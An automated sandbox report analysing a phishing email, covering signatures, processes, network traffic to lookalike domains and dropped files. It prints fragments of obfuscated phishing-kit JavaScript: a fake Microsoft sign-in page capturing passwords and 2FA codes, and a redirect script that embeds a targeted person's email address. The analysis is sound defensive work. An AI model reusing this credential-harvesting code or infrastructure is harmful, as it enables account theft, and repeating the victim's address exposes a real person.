
Windows Analysis Report
original (37).eml

Overview

General Information

Sample name:original (37).eml
Analysis ID:1513770
MD5:46780ed985e098575251fbda415651d7
SHA1:dc4d7804eb78e03f8b07f4ce7543c539ec063ba5
SHA256:ebaa85b67c633784b7bf51dfa0f217887c40b71724af99857e114809bb37e4b0

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found HTTP page in a blob
Javascript uses Clearbit API to dynamically determine company logos
Detected TCP or UDP traffic on non-standard ports
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6368 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\original (37).eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6932 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "9234D241-658A-4F1A-893D-2B99936CB692" "B03A8BDE-5D96-439A-A9A2-223F00FA92C7" "6368" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • OUTLOOK.EXE (PID: 6788 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\phish_alert_sp2_2.0.0.0.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • chrome.exe (PID: 5488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\Play_VM-NowVWAV.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1984,i,11331343023274198112,16441502776554874557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6368, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
Source: Registry Key set; Author: frack113; Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6368, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
No Suricata rule has matched

Phishing

Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; DOM page: Blob-based
Source: https://ksvbotech.store/gesp/xls/0xa937eg29be0xcs.js; HTTP Parser: var _0x7704 = [ 'ready', '#ai', '#next', '.logoimg', 'src', 'https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico', '#div1', '#div2', '#aich', '#error', '#submit-btn', '#div4', '#verify-2fa', '#div5', '#sign-in-another-way', '#div6', '#verify-text-2fa', 'https://logo.clearbit.com/', 'show', '1|2|3|4|0', 'head', '#pr', '#div3', 'success', '#user-email-otc', 'two_way_voice', '2|4|3|0|1', 'your\x20account\x20or\x20password\x20is\x20incorrect.\x20if\x20you\x20don\x27t\x20remember\x20your\x20password,\x20<a\x20href=\x27#\x27>reset\x20it\x20now</a>', '1|4|0|2|3', 'sorry,\x20your\x20sign-in\x20timed\x20out.\x20please\x20sign\x20in\x20again.', '#msg', 'internal\x20server\x20error.', 'json', '#msg-2fa', 'incorrect\x202fa\x20code.\x20try\x20again.', '#2fa-code', 'websocket\x20connection\x20closed', ...
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; HTTP Parser: Number of links: 0
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; HTTP Parser: <input type="password" .../> found but no <form action="...
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; HTTP Parser: Title: Microsoft Office does not match URL
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; HTTP Parser: Invalid link: Forgot Password?
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/ZVHF1XTO/Play_VM-NowVWAV.html; HTTP Parser: No favicon
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; HTTP Parser: No favicon
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; HTTP Parser: No <meta name="author".. found
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba; HTTP Parser: No <meta name="copyright".. found
Source: unknown; HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: global traffic; TCP traffic: 192.168.2.16:49736 -> 185.174.100.20:8020
Source: unknown; TCP traffic detected without corresponding DNS query: 192.229.211.108 (2 occurrences)
Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (24 occurrences)
Source: unknown; TCP traffic detected without corresponding DNS query: 40.127.169.103 (14 occurrences)
Source: global traffic; DNS traffic detected: DNS query: ksvbotech.store
Source: global traffic; DNS traffic detected: DNS query: sopbtech.store
Source: global traffic; DNS traffic detected: DNS query: code.jquery.com
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: global traffic; DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic; DNS traffic detected: DNS query: server.povbtech.store
Source: global traffic; DNS traffic detected: DNS query: _8020._https.server.povbtech.store
Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> local ports 49720-49726, 49728-49730, 49732-49735, 49737-49743 (21 connections)
Source: unknown; Network traffic detected: HTTP traffic on local ports 49678, 49720-49726, 49728-49730, 49732-49735, 49737-49743 -> 443 (22 connections)
Source: classification engine; Classification label: mal48.phis.winEML@20/33@24/85
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240919T0536250808-6368.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File read: C:\Users\desktop.ini
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\original (37).eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "9234D241-658A-4F1A-893D-2B99936CB692" "B03A8BDE-5D96-439A-A9A2-223F00FA92C7" "6368" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\phish_alert_sp2_2.0.0.0.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "9234D241-658A-4F1A-893D-2B99936CB692" "B03A8BDE-5D96-439A-A9A2-223F00FA92C7" "6368" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\Play_VM-NowVWAV.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1984,i,11331343023274198112,16441502776554874557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\phish_alert_sp2_2.0.0.0.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\Play_VM-NowVWAV.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown (2 occurrences)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1984,i,11331343023274198112,16441502776554874557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown (9 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Sections loaded: apphelp.dll, c2r64.dll, userenv.dll, msasn1.dll, kernel.appcore.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Window found: window name: SysTabControl32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Files created in C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\: Google Drive.lnk, YouTube.lnk, Sheets.lnk, Gmail.lnk, Slides.lnk, Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information set: NOOPENFILEERRORBOX (51 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information set: NOOPENFILEERRORBOX (28 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (a number in parentheses is the count of matching signatures for that technique; entries without a number are the empty matrix cells the report displays)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Login Hook
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Login Hook
Defense Evasion: Masquerading (1); Process Injection (1); DLL Side-Loading (1); Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Process Discovery (1); File and Directory Discovery (1); System Information Discovery (12); System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: Encrypted Channel (2); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (2)
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

No Antivirus matches (initial sample, dropped files and unpacked files)

Domains
Source                                  Detection  Scanner
bg.microsoft.map.fastly.net             0%         Virustotal
sopbtech.store                          4%         Virustotal
www.google.com                          0%         Virustotal
code.jquery.com                         1%         Virustotal
s-part-0044.t-0009.fb-t-msedge.net      0%         Virustotal
d26p066pn2w0s0.cloudfront.net           0%         Virustotal
server.povbtech.store                   3%         Virustotal
api.ipify.org                           0%         Virustotal
logo.clearbit.com                       0%         Virustotal
s-part-0029.t-0009.fb-t-msedge.net      0%         Virustotal

URLs
file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/ZVHF1XTO/Play_VM-NowVWAV.html
    Detection: 0%    Scanner: Avira URL Cloud    Label: safe
blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba
    Detection: 0%    Scanner: Avira URL Cloud    Label: safe
Domains
Name                                  IP               Active   Malicious  Antivirus Detection  Reputation
ksvbotech.store                       66.29.137.93     true     false      -                    unknown
bg.microsoft.map.fastly.net           199.232.210.172  true     false      -                    unknown
d26p066pn2w0s0.cloudfront.net         13.32.27.77      true     false      -                    unknown
s-part-0044.t-0009.fb-t-msedge.net    13.107.253.72    true     false      -                    unknown
s-part-0029.t-0009.fb-t-msedge.net    13.107.253.57    true     false      -                    unknown
code.jquery.com                       151.101.194.137  true     false      -                    unknown
sopbtech.store                        199.188.200.183  true     false      -                    unknown
server.povbtech.store                 185.174.100.20   true     false      -                    unknown
www.google.com                        142.250.184.196  true     false      -                    unknown
api.ipify.org                         104.26.13.205    true     false      -                    unknown
_8020._https.server.povbtech.store    unknown          unknown  false      -                    unknown
logo.clearbit.com                     unknown          unknown  true       -                    unknown

Note: _8020._https.server.povbtech.store is not a hostname the page typed out; it is the query name a resolver forms when looking up the HTTPS (SVCB) DNS record for server.povbtech.store on a non-default port (RFC 9460 uses _<port>._https.<host> for ports other than 443). Its presence means the page referenced that host with an explicit port 8020.
URLs
blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba
    Malicious: true    Antivirus Detection: Avira URL Cloud: safe    Reputation: unknown
file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/ZVHF1XTO/Play_VM-NowVWAV.html
    Malicious: false    Antivirus Detection: Avira URL Cloud: safe    Reputation: unknown
Contacted IPs
IP               Domain                               Country         ASN      ASN Name                            Malicious
52.113.194.132   unknown                              United States   8068     MICROSOFT-CORP-MSN-AS-BLOCK, US     false
142.250.184.196  www.google.com                       United States   15169    GOOGLE, US                          false
66.29.137.93     ksvbotech.store                      United States   19538    ADVANTAGECOM, US                    false
216.58.212.138   unknown                              United States   15169    GOOGLE, US                          false
13.32.27.77      d26p066pn2w0s0.cloudfront.net        United States   7018     ATT-INTERNET4, US                   false
52.109.68.130    unknown                              United States   8075     MICROSOFT-CORP-MSN-AS-BLOCK, US     false
142.250.186.174  unknown                              United States   15169    GOOGLE, US                          false
185.174.100.20   server.povbtech.store                Ukraine         8100     ASN-QUADRANET-GLOBAL, US            false
20.42.72.131     unknown                              United States   8075     MICROSOFT-CORP-MSN-AS-BLOCK, US     false
13.107.253.57    s-part-0029.t-0009.fb-t-msedge.net   United States   8068     MICROSOFT-CORP-MSN-AS-BLOCK, US     false
142.250.181.234  unknown                              United States   15169    GOOGLE, US                          false
199.188.200.183  sopbtech.store                       United States   22612    NAMECHEAP-NET, US                   false
151.101.130.137  unknown                              United States   54113    FASTLY, US                          false
74.125.206.84    unknown                              United States   15169    GOOGLE, US                          false
13.107.253.72    s-part-0044.t-0009.fb-t-msedge.net   United States   8068     MICROSOFT-CORP-MSN-AS-BLOCK, US     false
2.19.126.151     unknown                              European Union  16625    AKAMAI-AS, US                       false
239.255.255.250  unknown (SSDP multicast address)     Reserved        unknown  unknown                             false
52.109.28.47     unknown                              United States   8075     MICROSOFT-CORP-MSN-AS-BLOCK, US     false
142.250.186.131  unknown                              United States   15169    GOOGLE, US                          false
151.101.194.137  code.jquery.com                      United States   54113    FASTLY, US                          false
104.26.13.205    api.ipify.org                        United States   13335    CLOUDFLARENET, US                   false

Private IPs
192.168.2.16
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1513770
      Start date and time:2024-09-19 11:35:56 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsinteractivecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      Analysis Mode:stream
      Analysis stop reason:Timeout
      Sample name:original (37).eml
      Detection:MAL
      Classification:mal48.phis.winEML@20/33@24/85
      Cookbook Comments:
      • Found application associated with file extension: .eml
      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 52.113.194.132, 52.109.28.47, 2.19.126.151, 2.19.126.160
      • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, eur.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, uks-azsc-000.roaming.officeapps.live.com, s-0005.s-msedge.net, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, wu-b-net.trafficmanager.net, a1864.dscd.akamai.net
• Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetValueKey calls found.
Input: Email    Model: jbxai
Output:
{
"brand":["Globi"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

Input: URL blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba    Model: jbxai
Output:
{
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"Sign In",
"text_input_field_labels":["Enter Password",
"Forgot Password?"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

Input: URL blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0ba    Model: jbxai
Output:
{
"phishing_score":8,
"brands":["Microsoft"],
"sub_domain":"ksvbotech",
"legit_domain":"microsoft.com",
"partial_domain_match":true,
"brand_matches_associated_domain":false,
"reasons":"The domain name 'ksvbotech.store' does not match the brand name or any of Microsoft's known domains,
 and the top level domain 'store' is not commonly associated with Microsoft. This discrepancy raises concerns about the legitimacy of the webpage.",
"brand_matches":[false],
"url_match":false}
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):231348
      Entropy (8bit):4.395850586682651
      Encrypted:false
      SSDEEP:
      MD5:F3863188EFE304BD8DFAD46AD3D23A6A
      SHA1:A5008D2678425FACB9A6619D0F0003AD8E65772E
      SHA-256:364B342D16911C04ED1B1781D27B39F4AA1D5508525353B41871291673D7B496
      SHA-512:E4D35D8AEA33277E654BB202366A779DB87A0C279C27863C6B7E60BD61E79FB2017010EF7D053A885B204658D5A2D4DC623DC29D4A62394D5F2068B5F4E5DC46
      Malicious:false
      Reputation:unknown
      Preview:TH02...... ..e.\w.......SM01X...,......\w...........IPM.Activity...........h...............h............H..ht.............h........H^F.H..h\cal ...pDat...h@.8.0.........h..)...G........h........_`Rk...h..).@...I.lw...h....H...8.Wk...0....T...............d.........2h...............k..............!h.............. h)0X..........#h....8.........$hH^F.....8....."hp.I.....0.I...'h.."...........1h..).<.........0h....4....Wk../h....h.....WkH..h..G.p...t.....-h .............+h?.)....h................... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
      Category:dropped
      Size (bytes):4096
      Entropy (8bit):0.09304735440217722
      Encrypted:false
      SSDEEP:
      MD5:D0DE7DB24F7B0C0FE636B34E253F1562
      SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
      SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
      SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
      Malicious:false
      Reputation:unknown
      Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:SQLite Rollback Journal
      Category:dropped
      Size (bytes):4616
      Entropy (8bit):0.13298756720797703
      Encrypted:false
      SSDEEP:
      MD5:9FAEE8C40152D74D82A4C4FD08E6D056
      SHA1:5F7A717E6A872348871DE70EA2D8347770EBFE41
      SHA-256:F943000E64A9ED15AEDB12AF08AB4C0EC6E4D403D98DFABB13849A4D20CFCCB8
      SHA-512:0DBC6DF9A00A8A5F17457C90EEA6761F85DC07F888E9B8D55504760EFF02E3598EDD6D0803AD11764B23AEBDEAE54D27ADB4F28201C0832B0F826DA6F4FDCCA0
      Malicious:false
      Reputation:unknown
      Preview:.... .c.......`.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):32768
      Entropy (8bit):0.04442436008866249
      Encrypted:false
      SSDEEP:
      MD5:B1B4E359CEA5C2FAFFB746CD26B2856A
      SHA1:FCB38853DD0AD1B29A3684B594A9BEC45435B149
      SHA-256:E4BA74AA7F033C400A3040C9E9BF75EA517D69B28C5F06C848F8CF8886D4BFC6
      SHA-512:D1694CA782F6702415BFB5CD65646B04AB7FEC46A8157ED7E3ECD656D1C1E04605BD8F29F6A790723BD238357D8076C0284234466E2F623853E5EE93713F01A7
      Malicious:false
      Reputation:unknown
      Preview:..-........................uC....B.b..D.?.W......-........................uC....B.b..D.?.W............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:SQLite Write-Ahead Log, version 3007000
      Category:modified
      Size (bytes):45352
      Entropy (8bit):0.3943716126757746
      Encrypted:false
      SSDEEP:
      MD5:4F1F90BEF169B4BE9D416BF025A4E658
      SHA1:5456A8596BDF193EB2B80EA4A0DC3A1EB92BFD13
      SHA-256:5B5076A7CDAB98B7D2D5192FCEEEADE490AEAE166460EAD1E9BD46FD4D4163D4
      SHA-512:4D9EF1818FBFDED1CD501A586CFF57A441560B55D7A465354401016BFE12A68062D36D25E16585C06D0D462A880259D92A731FA934D940B7ACBF2A946B6D072C
      Malicious:false
      Reputation:unknown
      Preview:7....-............B.b..Ds)..o.............B.b..Di...8..8SQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:HTML document, ASCII text, with very long lines (2092), with CRLF line terminators
      Category:dropped
      Size (bytes):2459
      Entropy (8bit):5.511359010278195
      Encrypted:false
      SSDEEP:
      MD5:1AF87B60820D2A9FCF37480B1AC9C66F
      SHA1:627CD793B5D093CA6D97B03186390031E8214798
      SHA-256:EF5FE4103F48BF735FCF573E80717699C25E45E8AFB570685CF145AEE33410B6
      SHA-512:F14BA5F8A566085322C772F91C95FEDD5D19149BCF1484D81C86EC1D6C545B0242B74BC6D317576D959AC52E3D56C71B54EC13898248C21794F9B4F0C65C88A9
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Please Wait</title>..</head>..<body>..<p id="uxo" style="display:none;">uday.dukkipati@tdwilliamson.com</p>....<script>..const _0x19e8b5=_0x1be1;function _0xd048(){const _0x2759b6=['16940nTwiYF','2801908EyDxtQ','getElementById','abcdefghijklmnopqrstuvwxyz','2399130RTFwvl','innerText','7najGmm','uxo','1198248hbTyhv','includes','2583790VrRdBf','wcpufdi.tupsf/hftq/nth.iunm','join','://','length','1107852ngmrMf','4771404RMeFKW','location'];_0xd048=function(){return _0x2759b6;};return _0xd048();}(function(_0x5d9d3a,_0x27671e){const _0x11bf02=_0x1be1,_0x4ab80e=_0x5d9d3a();while(!![]){try{const _0x3b5f75=-parseInt(_0x11bf02(0x202))/0x1+-parseInt(_0x11bf02(0x1ff))/0x2+parseInt(_0x11bf02(0x1f4))/0x3+-parseInt(_0x11bf02(0x1f1))/0x4+parseInt(_0x11bf02(0x1fa))/0x5+parseInt(_0x11bf02(0
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:HTML document, ASCII text, with very long lines (2092), with CRLF line terminators
      Category:dropped
      Size (bytes):0
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:
